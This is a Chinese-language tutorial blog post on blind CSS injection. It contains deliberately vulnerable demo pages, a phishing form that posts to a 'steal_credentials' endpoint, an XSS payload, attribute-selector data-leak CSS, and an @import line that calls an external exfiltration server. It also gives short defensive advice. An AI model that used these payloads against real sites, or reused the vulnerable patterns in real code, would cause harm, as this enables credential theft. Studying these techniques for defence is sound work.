从CSS注入到渗透未知网页

2024-08-24 18:28

本文主要是介绍从CSS注入到渗透未知网页,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

简介

​ 这篇文章中,分享一个技巧。通过CSS注入盲打用户前端页面敏感数据

​ 需要的前提: 存在CSS注入漏洞的环境

​ 理论最高危害:1 click用户接管

环境记录

采取docker-compose 部署

  • 部署nginx-docker
mkdir nginx_test
cd nginx_test
touch docker-compose.yml
mkdir -p nginx/conf.d
touch nginx/conf.d/default.conf
  • docker-compose.yml
version: '3'
services:nginx:image: nginx:latestports:- "80:80"volumes:- ./nginx/conf.d:/etc/nginx/conf.d- ./html:/usr/share/nginx/html
  • nginx/conf.d default.conf
server {listen 80;server_name localhost;location / {root /usr/share/nginx/html;index index.html index.htm;}
}
  • nginx_test 目录
mkdir html
html/index.html<h1>Hello, Docker Compose with Nginx!</h1>
  • docker 启动
docker-compose up -d

从html注入开始

HTML注入攻击是一种网络攻击,攻击者将恶意HTML代码注入到Web应用程序中,操控页面的显示和行为。这种攻击通常用来进行钓鱼、会话劫持或跨站脚本(XSS)攻击。

一个demo

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>HTML Injection Vulnerability Example</title><style>body {font-family: Arial, sans-serif;}.container {max-width: 600px;margin: 50px auto;padding: 20px;border: 1px solid #ccc;box-shadow: 0 0 10px rgba(0,0,0,0.1);}.result {margin-top: 20px;padding: 10px;border: 1px solid #ccc;background-color: #f9f9f9;}</style>
</head>
<body><div class="container"><h1>HTML Injection Vulnerability Example</h1><form id="htmlForm"><label for="htmlInput">Enter your HTML:</label><br><textarea id="htmlInput" name="htmlInput" rows="10" cols="50"></textarea><br><br><button type="submit">Submit</button></form><div class="result" id="result"><p>This is a sample text to demonstrate HTML injection.</p></div></div><script>document.getElementById('htmlForm').addEventListener('submit', function(e) {e.preventDefault();const htmlInput = document.getElementById('htmlInput').value;document.getElementById('result').innerHTML = htmlInput;});</script>
</body>
</html>

注入恶意HTML

<h2>Injected Heading</h2>
<p>This is an injected paragraph.</p>

点击Submit按钮即可

钓鱼攻击

注入一个伪造的登录表单,诱骗用户输入敏感信息:

<form action="http://127.0.0.1/steal_credentials" method="POST"><label for="username">Username:</label><br><input type="text" id="username" name="username"><br><label for="password">Password:</label><br><input type="password" id="password" name="password"><br><br><button type="submit">Login</button>
</form>

xss攻击

<img src=1 href=1 onerror="javascript:alert(1)"></img>

防护措施

这部分简单概述

  • 输入过滤
document.getElementById('htmlForm').addEventListener('submit', function(e) {e.preventDefault();let htmlInput = document.getElementById('htmlInput').value;htmlInput = htmlInput.replace(/</g, "<").replace(/>/g, ">");document.getElementById('result').innerHTML = htmlInput;
});
  • 纯文本输入,前端不解析
document.getElementById('htmlForm').addEventListener('submit', function(e) {e.preventDefault();const htmlInput = document.getElementById('htmlInput').value;const textNode = document.createTextNode(htmlInput);const resultDiv = document.getElementById('result');resultDiv.innerHTML = '';resultDiv.appendChild(textNode);
});
  • 使用安全库和框架
  • CSP策略消减漏洞危害Content-Security-Policy: default-src 'self';

CSS注入

靶场页面

一个简单的demo,允许用户输入CSS代码,并将其应用于页面。

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>CSS Injection Vulnerability Example</title><style>body {font-family: Arial, sans-serif;}.container {max-width: 600px;margin: 50px auto;padding: 20px;border: 1px solid #ccc;box-shadow: 0 0 10px rgba(0,0,0,0.1);}.result {margin-top: 20px;padding: 10px;border: 1px solid #ccc;background-color: #f9f9f9;}</style>
</head>
<body><div class="container"><h1>CSS Injection Vulnerability Example</h1><form id="cssForm"><label for="cssInput">Enter your CSS:</label><br><textarea id="cssInput" name="cssInput" rows="10" cols="50"></textarea><br><br><button type="submit">Apply CSS</button></form><div class="result" id="result"><p>This is a sample text to demonstrate CSS injection.</p><p>Modify the CSS to change the appearance of this text.</p></div></div><script>document.getElementById('cssForm').addEventListener('submit', function(e) {e.preventDefault();const cssInput = document.getElementById('cssInput').value;const styleElement = document.createElement('style');styleElement.textContent = cssInput;document.head.appendChild(styleElement);});</script>
</body>
</html>
  • 输入简单的CSS代码,如p { color: red; },然后点击“Apply CSS”,观察页面样式的变化

  • 尝试输入恶意CSS代码,例如:
    body { background-image: url('https://www.baidu.com/img/doodlegaokaokaohou_5b0f886d182bfd1761854cb4dfa72fa8.gif'); }

防范措施(概述)

  • 输入过滤
    • 对用户输入的CSS代码进行严格的检查,避免注入恶意代码。
    • 只允许安全的CSS属性和值。

  • CSP策略同样有效
  • 用户输入不作为css格式解析

从CSS注入到页面数据外带(正文)

相比于传统的html注入,CSS注入通常是指通过注入恶意CSS代码来操纵页面样式,而不是直接执行JavaScript。想对于危害较低
一般需要结合其他漏洞进行组合利用

body {background-image: url('javascript:alert("CSS Injection")');
}

利用页面中未过滤的用户输入,通过注入恶意CSS代码,操控页面样式或进行间接攻击

  • 需要注意的是,本文只讨论只允许CSS样式注入从而带来的安全问题,同样适用于当找到一个html注入漏洞,但是由于网站CSP防护或者存在DOMPurify等防护机制,无法通过漏洞执行js的情况

基础知识

利用css变量触发请求

这里要注意的是:如果我们想窃取受害者敏感数据,那么需要向外部发起网络请求从而数据外带

  • 举一个例子(当输入的值等于"password"时,则通过此种方式发起http请求从而达到数据外带的目的)
<!DOCTYPE html>
<html lang="en">
<input value=password>
<style>
input[value="password"] {background: url(/collectData?value=password);
}
/* 如果不,则设置背景为百度 */input {background:url('https://www.baidu.com/img/doodlegaokaokaohou_5b0f886d182bfd1761854cb4dfa72fa8.gif');
}
</style>
</html>

css的一些语法(属性选择器)

  • 存在属性选择器
a[target] {color: orange;
}
  • 值等于选择器
a[target="_blank"] {color: pink;
}
  • 值包含选择器
a[title~="example"] {color: purple;
}
  • 值以指定字符开头选择器
a[href^="https"] {color: cyan;
}
  • 值以指定字符结尾选择器
a[href$=".pdf"] {color: brown;
}
  • 值包含子串选择器
a[href*="example"] {color: teal;
}

插入一个demo,方便理解

<style>
input[value^="a"] {color:red;
}
input[value$="f"] {
color:green;
}
</style>
<input value=abc>
<input value=def>

使用属性选择器提取数据

  • 当前,这就十分好理解了,定义了一个名为--starts-with-a的变量,并将该变量分配给输入的背景图像
<style>
input[value^="a"] {--starts-with-a:url(/startsWithA);
}
/* 如果没有a开头,则none不会发送请求 */input{background: var(--starts-with-a,none);
}
</style>
<input value=abc>
<input value=def>

  • 截至到现在,还有一些限制,
<style>
input[value^="a"] {--starts-with-a:url(/startsWithA);
}
/* 如果没有a开头,则none不会发送请求 */input{background: var(--starts-with-a,none);
}
</style>
<input type=hidden value=abc>
<input value=def>

比如当input设置为hidden属性时,则无法找到元素进而发起数据外带

css的一些语法(属性选择器)

继续挖掘一些css的语法

  • has选择器

:has() 选择器是CSS Selectors Level 4 中的一个提案,用于选择包含特定后代元素的父元素。它的语法形式为 :has(selector),其中 selector 是一个CSS选择器,表示要匹配的后代元素。

  • 继续还是上一个例子
<style>
html:has(input[value^="a"]) {--starts-with-a:url(/startsWithA);
}
/* 如果没有a开头,则none不会发送请求 */input{background: var(--starts-with-a,none);
}
</style>
<html>
<input type=hidden value=abc>
<input value=def>
</html>

  • 注意,这块我在input加了父html节点,因为has是需要父亲找子节点的,实际中的网站我们关注的数据几乎一定会有父节点
  • 多说一句:has选择器是需要浏览器进行支持的,可能较老的浏览器无法支持,本文章才用的浏览器版本为

在开发中,可以用Polyfill库进行代替(和文章中的安全关系较弱,只是多说一句)

  • not选择器

在CSS中,:not() 选择器允许你选择除了指定选择器之外的所有元素。它的语法形式为 :not(selector),其中 selector 是一个CSS选择器,表示不希望匹配的元素,其实就是和has相反

  • 比如上个例子中,只取abc 不取 def则
<style>
html:has(input[value^="a"]):not(input[name="def"]) {--starts-with-a:url(/startsWithA);
}
/* 如果没有a开头,则none不会发送请求 */input{background: var(--starts-with-a,none);
}
</style>
<html>
<input type=hidden value=abc>
<input value=def>
</html>

脚本开发&工具部署

  • 正如sql注入中的布尔盲注,需要写一个脚本,笔者感觉和sql注入盲注类似,又或者ssrf盲注的思想
  • @import css语法

在CSS中,@import 规则用于引入外部样式表文件,使得可以将一个CSS文件嵌入到另一个CSS文件中。这种方式可以帮助组织和管理样式表,使得代码结构更加清晰和模块化。

有了css的import,那么我们就可以写脚本进行数据提取了,这部分参考garethheyes大佬写的工具https://github.com/hackvertor/blind-css-exfiltration

  • 环境部署
node css-exfiltrator-server.js

  • 一个demo
<div id="academyLabHeader"><section class='academyLabBanner'><div class=container><div class=logo></div><div class=title-container><h2>Access control unprotected admin functionality</h2><a class=link-back href='https://portswigger.net'>Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;<svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow><g><polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon><polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon></g></svg></a></div><div class='widgetcontainer-lab-status is-notsolved'><span>LAB</span><p>Not solved</p><span class=lab-status-icon></span></div></div></div></section>
</div>
<div theme=""><section class="maincontainer"><div class="container is-page"><header class="navigation-header"><section class="top-links"><a href=/>Home</a><p>|</p><a href="/my-account">My account</a><p>|</p></section></header><header class="notification-header"></header><section><h1>Users</h1><div><span>wiener - </span><a href="/administrator-panel/delete?username=wiener">Delete</a></div><div><span>carlos - </span><a href="/administrator-panel/delete?username=carlos">Delete</a></div></section><br><hr></div></section><div class="footer-wrapper"></div><style>@import 'https://xxxxx/blind-css-exfiltration/start';    
</style>

写在最后

​ 仅代表一些css注入的思想,实际攻击的话外带的用户的敏感页面数据整体还是比较难的。需要一个特定的场景,万一就有一个弱auth-token会明文写道前端页面呢?这样危害则为1 click用户接管

这篇关于从CSS注入到渗透未知网页的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1103251

相关文章

网页解析 lxml 库--实战

lxml库使用流程 lxml 是 Python 的第三方解析库,完全使用 Python 语言编写,它对 XPath表达式提供了良好的支 持,因此能够了高效地解析 HTML/XML 文档。本节讲解如何通过 lxml 库解析 HTML 文档。 pip install lxml lxm| 库提供了一个 etree 模块,该模块专门用来解析 HTML/XML 文档,下面来介绍一下 lxml 库

Vue3 的 shallowRef 和 shallowReactive:优化性能

大家对 Vue3 的 ref 和 reactive 都很熟悉,那么对 shallowRef 和 shallowReactive 是否了解呢? 在编程和数据结构中,“shallow”(浅层)通常指对数据结构的最外层进行操作,而不递归地处理其内部或嵌套的数据。这种处理方式关注的是数据结构的第一层属性或元素,而忽略更深层次的嵌套内容。 1. 浅层与深层的对比 1.1 浅层(Shallow) 定义

这15个Vue指令,让你的项目开发爽到爆

1. V-Hotkey 仓库地址: github.com/Dafrok/v-ho… Demo: 戳这里 https://dafrok.github.io/v-hotkey 安装: npm install --save v-hotkey 这个指令可以给组件绑定一个或多个快捷键。你想要通过按下 Escape 键后隐藏某个组件,按住 Control 和回车键再显示它吗?小菜一碟: <template

【 html+css 绚丽Loading 】000046 三才归元阵

前言:哈喽,大家好,今天给大家分享html+css 绚丽Loading!并提供具体代码帮助大家深入理解,彻底掌握!创作不易,如果能帮助到大家或者给大家一些灵感和启发,欢迎收藏+关注哦 💕 目录 📚一、效果📚二、信息💡1.简介:💡2.外观描述:💡3.使用方式:💡4.战斗方式:💡5.提升:💡6.传说: 📚三、源代码,上代码,可以直接复制使用🎥效果🗂️目录✍️

【前端学习】AntV G6-08 深入图形与图形分组、自定义节点、节点动画(下)

【课程链接】 AntV G6:深入图形与图形分组、自定义节点、节点动画(下)_哔哩哔哩_bilibili 本章十吾老师讲解了一个复杂的自定义节点中,应该怎样去计算和绘制图形,如何给一个图形制作不间断的动画,以及在鼠标事件之后产生动画。(有点难,需要好好理解) <!DOCTYPE html><html><head><meta charset="UTF-8"><title>06

计算机毕业设计 大学志愿填报系统 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试

🍊作者:计算机编程-吉哥 🍊简介:专业从事JavaWeb程序开发,微信小程序开发,定制化项目、 源码、代码讲解、文档撰写、ppt制作。做自己喜欢的事,生活就是快乐的。 🍊心愿:点赞 👍 收藏 ⭐评论 📝 🍅 文末获取源码联系 👇🏻 精彩专栏推荐订阅 👇🏻 不然下次找不到哟~Java毕业设计项目~热门选题推荐《1000套》 目录 1.技术选型 2.开发工具 3.功能

Vue3项目开发——新闻发布管理系统(六)

文章目录 八、首页设计开发1、页面设计2、登录访问拦截实现3、用户基本信息显示①封装用户基本信息获取接口②用户基本信息存储③用户基本信息调用④用户基本信息动态渲染 4、退出功能实现①注册点击事件②添加退出功能③数据清理 5、代码下载 八、首页设计开发 登录成功后,系统就进入了首页。接下来,也就进行首页的开发了。 1、页面设计 系统页面主要分为三部分,左侧为系统的菜单栏,右侧

【VUE】跨域问题的概念,以及解决方法。

目录 1.跨域概念 2.解决方法 2.1 配置网络请求代理 2.2 使用@CrossOrigin 注解 2.3 通过配置文件实现跨域 2.4 添加 CorsWebFilter 来解决跨域问题 1.跨域概念 跨域问题是由于浏览器实施了同源策略,该策略要求请求的域名、协议和端口必须与提供资源的服务相同。如果不相同,则需要服务器显式地允许这种跨域请求。一般在springbo

EasyPlayer.js网页H5 Web js播放器能力合集

最近遇到一个需求,要求做一款播放器,发现能力上跟EasyPlayer.js基本一致,满足要求: 需求 功性能 分类 需求描述 功能 预览 分屏模式 单分屏(单屏/全屏) 多分屏(2*2) 多分屏(3*3) 多分屏(4*4) 播放控制 播放(单个或全部) 暂停(暂停时展示最后一帧画面) 停止(单个或全部) 声音控制(开关/音量调节) 主辅码流切换 辅助功能 屏

HTML提交表单给python

python 代码 from flask import Flask, request, render_template, redirect, url_forapp = Flask(__name__)@app.route('/')def form():# 渲染表单页面return render_template('./index.html')@app.route('/submit_form',